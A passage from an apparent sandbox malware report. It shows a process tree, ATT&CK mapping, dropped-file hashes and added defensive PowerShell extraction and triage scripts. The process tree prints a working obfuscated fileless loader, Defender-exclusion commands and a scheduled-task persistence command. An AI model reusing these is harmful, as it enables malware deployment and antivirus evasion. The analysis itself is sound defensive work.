            [depth 7] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
              - Command and Scripting Interpreter: PowerShell
              - Suspicious behavior: EnumeratesProcesses
            [depth 7] C:\Windows\system32\cmd.exe
              cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qyndhi.bat" "
              [depth 8] C:\Windows\system32\cmd.exe
                cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IjJvKUiZ3qVbekS9RBld+s/2H9KCxAMxfp72UAdOekw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RSqfgbsxY4tQviMhgruGlA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $mTJVo=New-Object System.IO.MemoryStream(,$param_var); $OVEZJ=New-Object System.IO.MemoryStream; $xpowC=New-Object System.IO.Compression.GZipStream($mTJVo, [IO.Compression.CompressionMode]::Decompress); $xpowC.CopyTo($OVEZJ); $xpowC.Dispose(); $mTJVo.Dispose(); $OVEZJ.Dispose(); $OVEZJ.ToArray();}function execute_function($param_var,$param2_var){ $aXdmE=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $plyTG=$aXdmE.EntryPoint; $plyTG.Invoke($null, $param2_var);}$DUACE = 'C:\Users\Admin\AppData\Local\Temp\qyndhi.bat';$host.UI.RawUI.WindowTitle = $DUACE;$NSEOn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DUACE).Split([Environment]::NewLine);foreach ($fxoWu in $NSEOn) { if ($fxoWu.StartsWith('WopmnYnvzYwvYHEKXXam')) { $rQXdu=$fxoWu.Substring(20); break; }}$payloads_var=[string[]]$rQXdu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\powershell.exe'9⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "powershell" /tr "C:\Users\Admin\AppData\Roaming\powershell.exe"9⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
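The cmd.exe /S /D /c node at depth 8 is the whole second stage in clear text once the reversed-string tricks are undone: 'gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'daoL'[-1..-4] is Load and 'txeTllAdaeR'[-1..-11] is ReadAllText. The script reopens the batch file that launched it, takes the line that starts with WopmnYnvzYwvYHEKXXam, splits the rest on '\', reverses the '#' to '/' and '@' to 'A' substitutions, base64-decodes, AES-CBC-decrypts with the hard-coded 32-byte key and 16-byte IV (PKCS7 padding), gunzips, and hands each result to Assembly.Load followed by EntryPoint.Invoke, so neither .NET payload is written to disk. The PowerShell below is an added extractor, not code from the report or from the sample: it repeats that decode path with the same key, IV and marker but writes the payloads out and hashes them instead of loading them. The -BatPath and -OutDir parameters, the function names and the payloadN.bin naming are this example's own. Run it only inside an analysis VM.

```powershell
# Added example: offline extractor for the two-stage loader recovered above.
# Mirrors decrypt_function / decompress_function but never calls Assembly.Load.
param(
    [Parameter(Mandatory)][string]$BatPath,              # the .bat carrying the marker line
    [string]$OutDir = (Join-Path (Get-Location) 'extracted')
)

# Key, IV and marker are the values hard-coded in the recovered script.
$KeyB64 = 'IjJvKUiZ3qVbekS9RBld+s/2H9KCxAMxfp72UAdOekw='   # 32 bytes -> AES-256
$IvB64  = 'RSqfgbsxY4tQviMhgruGlA=='                       # 16 bytes
$Marker = 'WopmnYnvzYwvYHEKXXam'                           # 20 chars, hence Substring(20)

function Decrypt-Aes([byte[]]$Data) {
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = [Convert]::FromBase64String($KeyB64)
        $aes.IV      = [Convert]::FromBase64String($IvB64)
        $dec = $aes.CreateDecryptor()
        try { return ,$dec.TransformFinalBlock($Data, 0, $Data.Length) }   # leading comma keeps byte[] intact
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-Gzip([byte[]]$Data) {
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out); return ,$out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

# Same selection the loader makes: first line that starts with the marker.
$line = Get-Content -LiteralPath $BatPath | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
if (-not $line) { throw "marker line $Marker not found in $BatPath" }

# Payloads are '\'-separated after the marker; '#' and '@' stand in for '/' and 'A'.
$blobs = $line.Substring($Marker.Length).Split('\')
New-Item -ItemType Directory -Force -Path $OutDir | Out-Null

$i = 0
foreach ($b in $blobs) {
    $raw  = [Convert]::FromBase64String($b.Replace('#', '/').Replace('@', 'A'))
    $pe   = Expand-Gzip (Decrypt-Aes $raw)
    $path = Join-Path $OutDir ('payload{0}.bin' -f $i)
    [IO.File]::WriteAllBytes($path, $pe)
    $isPe = ($pe.Length -gt 2 -and $pe[0] -eq 0x4D -and $pe[1] -eq 0x5A)   # 'MZ' header check
    $hash = (Get-FileHash -Algorithm SHA256 -LiteralPath $path).Hash
    '{0}: {1} bytes, MZ={2}, SHA256={3}' -f $path, $pe.Length, $isPe, $hash
    $i++
}
```

Usage: `.\extract-stage2.ps1 -BatPath C:\cases\qyndhi.bat -OutDir C:\cases\out` (script file name assumed). In this sample the loader invokes payload 0 with no arguments and payload 1 with an empty string array, so both extracted files should be managed PE images that can be opened in a .NET decompiler; a file without the MZ header means the marker line or the substitution map differs from this variant.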
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Execution
- Command and Scripting Interpreter (1): PowerShell (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
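The Add-MpPreference, schtasks and Run-key activity in the process tree and the Persistence techniques listed above map to a few host checks. The following PowerShell is an added triage script, not part of the sandbox report: it queries Defender exclusions, scheduled tasks and Run keys for the patterns this sample leaves behind (an exclusion on powershell.exe or on a path under AppData, a task that repeats every minute and runs an executable from the user profile, Run values pointing into AppData or Temp, and files dropped in the user Startup folder). The function names and output fields are this example's own; Get-MpPreference and the HKLM Run key need an elevated prompt, and the regular expressions are deliberately broad, so review hits by hand.

```powershell
# Added example: host triage for the defense-evasion and persistence artifacts
# recorded in this report. Reports findings; does not remove anything.

function Get-SuspiciousDefenderExclusions {
    # The sample added an ExclusionPath for powershell.exe (system and AppData copies)
    # and an ExclusionProcess for 'powershell.exe'.
    $pref = Get-MpPreference
    foreach ($p in @($pref.ExclusionPath)) {
        if ($p -and ($p -match '\\AppData\\' -or $p -match 'powershell\.exe$')) {
            [pscustomobject]@{ Kind = 'ExclusionPath'; Value = $p }
        }
    }
    foreach ($p in @($pref.ExclusionProcess)) {
        if ($p -and $p -match 'powershell\.exe$') {
            [pscustomobject]@{ Kind = 'ExclusionProcess'; Value = $p }
        }
    }
}

function Get-MinuteTasksFromUserPaths {
    # schtasks /sc minute /mo 1 /RL HIGHEST /tr <AppData path> yields a task whose action
    # executes from the profile and whose trigger repeats with interval PT1M.
    foreach ($t in Get-ScheduledTask) {
        foreach ($a in @($t.Actions)) {
            if ($a.Execute -and $a.Execute -match '\\Users\\[^\\]+\\AppData\\') {
                $intervals = @($t.Triggers | ForEach-Object { $_.Repetition.Interval } | Where-Object { $_ })
                [pscustomobject]@{
                    Kind     = 'ScheduledTask'
                    Name     = $t.TaskPath + $t.TaskName
                    Execute  = $a.Execute
                    Interval = ($intervals -join ',')
                    RunLevel = $t.Principal.RunLevel
                }
            }
        }
    }
}

function Get-RunKeysFromUserPaths {
    $keys = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
            'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        $props = Get-ItemProperty -Path $k
        # Skip the PSPath/PSParentPath/... properties the provider adds.
        foreach ($prop in ($props.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' })) {
            $val = [string]$prop.Value
            if ($val -match 'AppData' -or $val -match '\\Temp\\') {
                [pscustomobject]@{ Kind = 'RunKey'; Key = $k; Name = $prop.Name; Value = $val }
            }
        }
    }
}

function Get-StartupFolderDrops {
    # "Drops startup file" signature: anything recently written to the per-user Startup folder.
    $startup = Join-Path $env:APPDATA 'Microsoft\Windows\Start Menu\Programs\Startup'
    if (Test-Path $startup) {
        Get-ChildItem -LiteralPath $startup -File | ForEach-Object {
            [pscustomobject]@{ Kind = 'StartupFile'; Path = $_.FullName; Written = $_.LastWriteTime }
        }
    }
}

$findings = @(Get-SuspiciousDefenderExclusions) +
            @(Get-MinuteTasksFromUserPaths) +
            @(Get-RunKeysFromUserPaths) +
            @(Get-StartupFolderDrops)

if ($findings.Count -eq 0) { 'no matching artifacts found' } else { $findings | Format-List }
```

On the host in this report the task check would surface a task named "powershell" with Execute set to C:\Users\Admin\AppData\Roaming\powershell.exe, Interval PT1M and RunLevel Highest, and the exclusion check would list both powershell.exe paths plus the 'powershell.exe' process exclusion. An exclusion on the interpreter itself is the item to remove first (Remove-MpPreference), since every later PowerShell stage runs unscanned while it stands.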
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize: 2KB
MD5: 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1: 445bf1b07223a04f8a159581a3d37d630273010f
SHA256: 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512: 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize: 53KB
MD5: a26df49623eff12a70a93f649776dab7
SHA1: efb53bd0df3ac34bd119adf8788127ad57e53803
SHA256: 4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
SHA512: e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize: 2KB
MD5: 005bc2ef5a9d890fb2297be6a36f01c2
SHA1: 0c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256: 342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512: f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: fefc3c2e8b3bc905d96dc7ce2d0eaad3
SHA1: debd9cb93c1801c881ae20ffe67d65d12e1cf8c3
SHA256: b59a972429f6f91b9a3c3f3951101d6675543d2932ba1fe1e463dc8799486002
SHA512: 96ded891c94bff4a24771dfa8d2ea17c2fee73e580f35f43c93e68a5ef8665ef3ce26441652c5253c21bd18a144d8b313dcd5679ee879031703b3a609d6c35c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
MD5: e243a38635ff9a06c87c2a61a2200656
SHA1: ecd95ed5bf1a9fbe96a8448fc2814a0210fa2afc
SHA256: af5782703f3f2d5a29fb313dae6680a64134db26064d4a321a3f23b75f6ca00f
SHA512: 4418957a1b10eee44cf270c81816ae707352411c4f5ac14b6b61ab537c91480e24e0a0a2c276a6291081b4984c123cf673a45dcedb0ceeef682054ba0fc19cb4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 944B
MD5: eb1ad317bd25b55b2bbdce8a28a74a94
SHA1: 98a3978be4d10d62e7411946474579ee5bdc5ea6
SHA256: 9e94e7c9ac6134ee30e79498558aa1a5a1ac79a643666c3f8922eed215dd3a98
SHA512: d011f266c0240d84470c0f9577cd9e4927309bd19bb38570ca9704ed8e1d159f9bea982a59d3eefef72ce7a10bd81208b82e88ef57c7af587f7437a89769adc0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize: 1KB
MD5: 08f9f3eb63ff567d1ee2a25e9bbf18f0
SHA1: 6bf06056d1bb14c183490caf950e29ac9d73643a
SHA256: 82147660dc8d3259f87906470e055ae572c1681201f74989b08789298511e5f0
SHA512: 425a4a8babbc11664d9bac3232b42c45ce8430b3f0b2ae3d9c8e12ad665cd4b4cbae98280084ee77cf463b852309d02ca43e5742a46c842c6b00431fc047d512
-
C:\Users\Admin\AppData\Local\Temp\$TMP~.bat
Filesize: 135B
MD5: 6bf11eb7e2ca37624f85d163b2a3f866
SHA1: 00a65cddc32344d3b15b6bca4315ff692524494b
SHA256: c4c7558e442c5f915fd6caf1290610ca2423dafca97ae05b1eac715f4267197b
SHA512: 79c8ba8ad545244c9c3765f32f291ffe918d8af1bcf7b3d375fdfee70e39ae4a548e25425ac3f2252276777a784a2ba5fd64f833b7776a413d4cabc3932272e0
-
C:\Users\Admin\AppData\Local\Temp\7zip.exe
Filesize: 65KB
MD5: aa4404671315c6f141a264b628d05052
SHA1: 5e1b52fd1b3ce93f82c35b8e07c08774003dd422
SHA256: d09701eb2589607f7827408b297ce94f8f3f9afcbc77a8f098cac2df6ccb8d18
SHA512: 5a8e8398e126d760f5486de6fae139f3e597f26da2eccc89234c32131c352259a4b8cd19596ab58dd45ca66356f89290cbdb74d7e8b7daee1af73204fda08eca
-
C:\Users\Admin\AppData\Local\Temp\WinRunner.exe
Filesize: 10.2MB
MD5: 4758850f5686ee8da4e930c97d6caca2
SHA1: 190f3d1b98411cc586546780a59d7c5730ab3d64
SHA256: cdd06b27fd62b93abf2eadf7ad388fca617951a834c612862a5ee3c0c2cd72a3
SHA512: c764ebd03544b5073577e2d5f84d8134d119b78a41179f24092cd9051f6396fcff639131c3e27617e0f40030f1af0d9e02a3f7d62e2987edbc4c9e26bbd3a1af
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aba34oxz.1ra.ps1
Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\conhost.exe
Filesize: 63KB
MD5: c8be6e344fd58475e1cfe3bf12e69380
SHA1: da41de66884faeccc83283accc0d23a722915774
SHA256: ccd4b5bf3a42a5006ced7f25a17765b778c17c6bb28a488dd466d493709cdec0
SHA512: 46639ab300a492f1d7783a27a349674a22b112b26a77e5ee7c3f910b88f2fa4f8e581b72e3e4632b4bdf7a04d63d1e3153a8989b2974bc4bdca985576c71cea8
-
C:\Users\Admin\AppData\Local\Temp\libcrypto-3.dll
Filesize: 3.9MB
MD5: 27c8a62563e3f34f3466d3cbf4b8fe74
SHA1: 23a2585b4afa8e77d365fb1bcf8c96d7273b9742
SHA256: 3927d87e03ad83e22a40fdcb680707a28eb04314af51f228130d8396dabb3de4
SHA512: c24f2725a05b209895e4de7b548fc7782d5695bcadc6b79a742c9860efa4691f4cb0b997bb1035b379c64de9d5476e6425e1e76e0b6d73faee635e7fc87207d1
-
C:\Users\Admin\AppData\Local\Temp\libssl-3.dll
Filesize: 661KB
MD5: 24f02f8bd55813c87a4952e60e87edf1
SHA1: c19834e2d64dd44d84d58c73d88b454fd6ccb385
SHA256: 70b3b431d10ca9dea42b5b5aca85a97c39c91e0e2e3b5763514c1608a5f980b3
SHA512: 04922a3a80d551cfada9fcb765966eeca0741bfff3469a551d538580b64a70d8f1a6a94abada3762a79cd6fd2222eb38c9e491a74fc19937bbd8ab309770f7ad
-
C:\Users\Admin\AppData\Local\Temp\libuac.dll.bat
Filesize: 5.9MB
MD5: 01132c50b0d844fab3b44bdb50be7445
SHA1: c1212c8576c7794a2bbcf86f6a5bbd212fa23994
SHA256: 874cd778f30a84b531ed0811536dd64fdf3259db9509116f3eb3414127a4e0bf
SHA512: 96be33e08ca7a4b7331f96488182d999d94a57923d70d6af0acda64795e3c4fc5cab55b16661af48832b63ea38bf39a40dfe636f479709e0d4afb723ac3d9c31
-
C:\Users\Admin\AppData\Local\Temp\ncat.exe
Filesize: 355KB
MD5: 4f6b1c5a41f7e9d183a7dd3ace65812e
SHA1: c08a5e5c59f39522939284ee8743ff55967da76a
SHA256: a3071223a56a18c9fb913696487f69d1ea2633176412446d4b7eecc82d33c262
SHA512: 25c7a3f16b001144cc8fdc5c9014cdfe33352bd76c116c3e1b7e3238668ae0b284fc641b96aee92d07dc9a25fa9b016e441db96c07f2426e09b0ec9b8d2443cf
-
C:\Users\Admin\AppData\Local\Temp\wininit.exe
Filesize: 409KB
MD5: ba300d38cfdf1c73eddcd7a1ac589b78
SHA1: c8741781f775f51dbf559ae783adcd762b036946
SHA256: e35f07e7fab453e5366f8f220d8302f31dc134aebc71fedc6beb113c9706961f
SHA512: 19274f0742d4e82c3f184ec264bb8f9d4fd3c7092b51ec63b727c3ab33ef70cd36805f1f7c52c663ff72496c79b827c23bfc547031f60e62dba396bdaaa50047
-
C:\Users\Admin\AppData\Roaming\Windows_Log_249.vbs
Filesize: 115B
MD5: 6f8d66bf74c28786cb983fe4bb15a09d
SHA1: b814ac7d5474eaa37a1e960bd58c439b74680225
SHA256: 5b3d9383ab911ca76a6bffa6a6cba314171b02bfa0b87a415fec7fec970b4ed6
SHA512: bbd6765cf4750ee9eb5ee35c2cb4e6892aff0f7c5542ca33d839f488f22139c8bb431ce4c28ad323312977d64559a1c02a27f0b1e33f1cb0a1f9d7e50ff574e2
-
C:\Users\Admin\AppData\Roaming\powershell.exe
Filesize: 442KB
MD5: 04029e121a0cfa5991749937dd22a1d9
SHA1: f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256: 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512: 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
memory/396-151-0x00000000061D0000-0x0000000006214000-memory.dmp
Filesize: 272KB
-
memory/396-149-0x0000000005C80000-0x0000000005C9E000-memory.dmp
Filesize: 120KB
-
memory/396-138-0x0000000005700000-0x0000000005766000-memory.dmp
Filesize: 408KB
-
memory/396-136-0x0000000004DC0000-0x0000000004DE2000-memory.dmp
Filesize: 136KB
-
memory/396-135-0x0000000004E30000-0x0000000005458000-memory.dmp
Filesize: 6.2MB
-
memory/396-176-0x0000000007690000-0x0000000007D0A000-memory.dmp
Filesize: 6.5MB
-
memory/396-134-0x00000000047A0000-0x00000000047D6000-memory.dmp
Filesize: 216KB
-
memory/396-177-0x0000000007030000-0x000000000704A000-memory.dmp
Filesize: 104KB
-
memory/396-150-0x0000000005CD0000-0x0000000005D1C000-memory.dmp
Filesize: 304KB
-
memory/396-137-0x0000000005690000-0x00000000056F6000-memory.dmp
Filesize: 408KB
-
memory/396-148-0x0000000005770000-0x0000000005AC4000-memory.dmp
Filesize: 3.3MB
-
memory/396-154-0x0000000006F90000-0x0000000007006000-memory.dmp
Filesize: 472KB
-
memory/816-500-0x000001CA1F250000-0x000001CA1F26C000-memory.dmp
Filesize: 112KB
-
memory/816-501-0x000001CA1F240000-0x000001CA1F24A000-memory.dmp
Filesize: 40KB
-
memory/816-502-0x000001CA1F3B0000-0x000001CA1F3B8000-memory.dmp
Filesize: 32KB
-
memory/816-503-0x000001CA1F3C0000-0x000001CA1F3CA000-memory.dmp
Filesize: 40KB
-
memory/856-289-0x0000000006230000-0x0000000006584000-memory.dmp
Filesize: 3.3MB
-
memory/960-438-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/1036-448-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/1124-437-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/1248-249-0x0000000005EF0000-0x0000000006244000-memory.dmp
Filesize: 3.3MB
-
memory/1352-443-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/1520-445-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/1588-110-0x0000000000180000-0x0000000000196000-memory.dmp
Filesize: 88KB
-
memory/1740-441-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/1912-444-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/2080-447-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/2116-436-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/2156-442-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/2196-449-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/2216-440-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/2500-439-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/2516-117-0x000001A1DBF20000-0x000001A1DC94C000-memory.dmp
Filesize: 10.2MB
-
memory/2556-11-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmp
Filesize: 10.8MB
-
memory/2556-12-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmp
Filesize: 10.8MB
-
memory/2556-16-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmp
Filesize: 10.8MB
-
memory/2556-0-0x00007FFBF7793000-0x00007FFBF7795000-memory.dmp
Filesize: 8KB
-
memory/2556-10-0x000001E57EA70000-0x000001E57EA92000-memory.dmp
Filesize: 136KB
-
memory/2652-234-0x000000001C980000-0x000000001C98E000-memory.dmp
Filesize: 56KB
-
memory/2652-111-0x0000000000E90000-0x0000000000EA6000-memory.dmp
Filesize: 88KB
-
memory/2724-435-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/2796-72-0x000002B3CDD80000-0x000002B3CDD9A000-memory.dmp
Filesize: 104KB
-
memory/2796-371-0x000002B3AB1B0000-0x000002B3AB1BC000-memory.dmp
Filesize: 48KB
-
memory/3224-121-0x00000000058B0000-0x0000000005942000-memory.dmp
Filesize: 584KB
-
memory/3224-153-0x0000000006AC0000-0x0000000006AFC000-memory.dmp
Filesize: 240KB
-
memory/3224-112-0x0000000000F40000-0x0000000000FAC000-memory.dmp
Filesize: 432KB
-
memory/3224-152-0x0000000006580000-0x0000000006592000-memory.dmp
Filesize: 72KB
-
memory/3224-179-0x00000000070A0000-0x00000000070AA000-memory.dmp
Filesize: 40KB
-
memory/3224-113-0x0000000005E60000-0x0000000006404000-memory.dmp
Filesize: 5.6MB
-
memory/3468-386-0x0000000003340000-0x000000000336A000-memory.dmp
Filesize: 168KB
-
memory/3468-434-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/4424-219-0x0000000006AD0000-0x0000000006B1C000-memory.dmp
Filesize: 304KB
-
memory/4424-214-0x0000000006070000-0x00000000063C4000-memory.dmp
Filesize: 3.3MB
-
memory/4476-383-0x000001EBA93B0000-0x000001EBA93B8000-memory.dmp
Filesize: 32KB
-
memory/4476-384-0x000001EBA97B0000-0x000001EBA97FC000-memory.dmp
Filesize: 304KB
-
memory/4476-385-0x000001EBA93C0000-0x000001EBA93D6000-memory.dmp
Filesize: 88KB
-
memory/4860-446-0x00007FFBD5A90000-0x00007FFBD5AA0000-memory.dmp
Filesize: 64KB
-
memory/5020-24-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmp
Filesize: 10.8MB
-
memory/5020-32-0x0000014967A10000-0x0000014967A86000-memory.dmp
Filesize: 472KB
-
memory/5020-29-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmp
Filesize: 10.8MB
-
memory/5020-31-0x0000014967940000-0x0000014967984000-memory.dmp
Filesize: 272KB
-
memory/5020-30-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmp
Filesize: 10.8MB
-
memory/5020-33-0x000001494CF60000-0x000001494CF68000-memory.dmp
Filesize: 32KB
-
memory/5020-34-0x0000014977DB0000-0x0000014978884000-memory.dmp
Filesize: 10.8MB
-
memory/5020-63-0x00007FFBF7790000-0x00007FFBF8251000-memory.dmp
Filesize: 10.8MB